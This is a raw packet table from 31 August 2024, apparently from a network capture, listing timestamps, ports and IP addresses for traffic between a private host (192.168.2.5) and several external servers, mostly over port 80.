Aug 31, 2024 15:44:19.155390978 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:19.155399084 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:19.155406952 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:19.155411959 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.155419111 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.155436039 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.155440092 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:19.155442953 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.155442953 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:19.155452967 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:19.155461073 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:19.155463934 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:19.155477047 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.155478954 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:19.155487061 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:19.155508041 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:19.155517101 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:19.155519962 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:19.218542099 CEST	45580	49721	65.21.18.51	192.168.2.5
Aug 31, 2024 15:44:19.228849888 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:19.228998899 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:19.229005098 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:19.229013920 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:19.229023933 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:19.229042053 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:19.229051113 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:19.229060888 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:19.229073048 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:19.229073048 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:19.229124069 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:19.229922056 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:19.232584953 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:19.240006924 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.240016937 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.240027905 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.240036964 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.240048885 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.240077972 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.240098953 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.240169048 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.240180016 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.240190029 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.240217924 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.240228891 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.240541935 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.240628004 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.240636110 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.240652084 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.240662098 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.240679979 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.240700006 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.240783930 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.240793943 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.240803957 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.240812063 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.240849018 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.240991116 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.241000891 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.241020918 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.241030931 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.241034031 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.241041899 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.241051912 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.241053104 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.241070032 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.241087914 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.241126060 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.241511106 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.241528034 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.241537094 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.241559982 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.241571903 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.241664886 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.241674900 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.241688013 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.241697073 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.241708040 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.241715908 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.241725922 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.241736889 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.241750956 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.241769075 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.241802931 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.241813898 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.241823912 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.241833925 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.241844893 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.241853952 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.241878033 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.242389917 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.242400885 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.242410898 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.242454052 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.242465973 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.242500067 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.242510080 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.242520094 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.242538929 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.242552042 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.242670059 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.242680073 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.242688894 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.242697001 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.242707014 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.242716074 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.242729902 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.242743969 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.242758989 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.242774010 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.242784023 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.242796898 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.242804050 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.242816925 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.242827892 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.242846012 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.243860006 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.243870974 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.243880987 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.243913889 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.243915081 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.243928909 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.243949890 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.243952036 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.243959904 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.243994951 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.244187117 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.244196892 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.244206905 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.244215965 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.244225025 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.244235039 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.244252920 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.244254112 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.244263887 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.244267941 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.244276047 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.244287014 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.244296074 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.244303942 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.244318008 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.244335890 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.244818926 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.244867086 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.244869947 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.244878054 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.244923115 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.245053053 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.245064020 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.245095968 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.245105982 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.245110989 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.245121956 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.245146990 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.245158911 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.245318890 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.245357037 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.245389938 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.245400906 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.245443106 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.245444059 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.245454073 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.245464087 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.245487928 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.245502949 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.245502949 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.245542049 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.245552063 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.245563030 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.245573044 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.245583057 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.245596886 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.245606899 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.245625973 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.245663881 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.245673895 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.245683908 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.245692015 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.245704889 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.245716095 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.245733023 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.246419907 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.246429920 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.246439934 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.246448994 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.246459961 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.246469021 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.246471882 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.246479034 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.246485949 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.246500969 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.246514082 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.246548891 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.246561050 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.246570110 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.246579885 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.246589899 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.246593952 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.246602058 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.246607065 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.246623039 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.246630907 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.246634960 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.246637106 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.246650934 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.246663094 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.246669054 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.246678114 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.246680021 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.246691942 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.246694088 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.246722937 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.246741056 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.246813059 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.246824026 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.246833086 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.246860981 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.246870995 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.247581959 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.247592926 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.247601986 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.247648001 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.247735977 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.247746944 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.247756958 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.247766018 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.247786045 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.247797966 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.249563932 CEST	49721	45580	192.168.2.5	65.21.18.51
Aug 31, 2024 15:44:19.255036116 CEST	45580	49721	65.21.18.51	192.168.2.5
Aug 31, 2024 15:44:19.285964012 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:19.286010981 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:19.286046028 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:19.286061049 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:19.286063910 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:19.286106110 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:19.286149025 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:19.286159992 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:19.286169052 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:19.286199093 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:19.286231995 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:19.330754042 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.330816984 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.330826998 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.330837011 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.330847979 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.330852032 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.330852032 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.330888987 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.330941916 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.330982924 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.331042051 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.331094980 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.331336021 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.331382036 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.331463099 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.331473112 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.331482887 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.331492901 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.331502914 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.331509113 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.331513882 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.331526041 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.331527948 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.331553936 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.331578016 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.331770897 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.331782103 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.331796885 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.331808090 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.331819057 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.331819057 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.331825018 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.331835032 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.331845999 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.331851006 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.331887960 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.331907034 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.332425117 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.332434893 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.332452059 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.332478046 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.332501888 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.332513094 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.332523108 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.332535982 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.332552910 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.332562923 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.332565069 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.332566977 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.332572937 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.332573891 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.332578897 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.332642078 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.332722902 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.332732916 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.332742929 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.332751036 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.332776070 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.332788944 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.332818985 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.333228111 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.333249092 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.333266020 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.333275080 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.333281040 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.333288908 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.333293915 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.333298922 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.333309889 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.333313942 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.333326101 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.333340883 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.333348036 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.333378077 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.333678007 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.333688021 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.333702087 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.333710909 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.333715916 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.333724022 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.333731890 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.333735943 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.333756924 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.333765030 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.333772898 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.333806992 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.334796906 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.334806919 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.334847927 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.334880114 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.334892035 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.334904909 CEST	80	49727	52.212.52.84	192.168.2.5
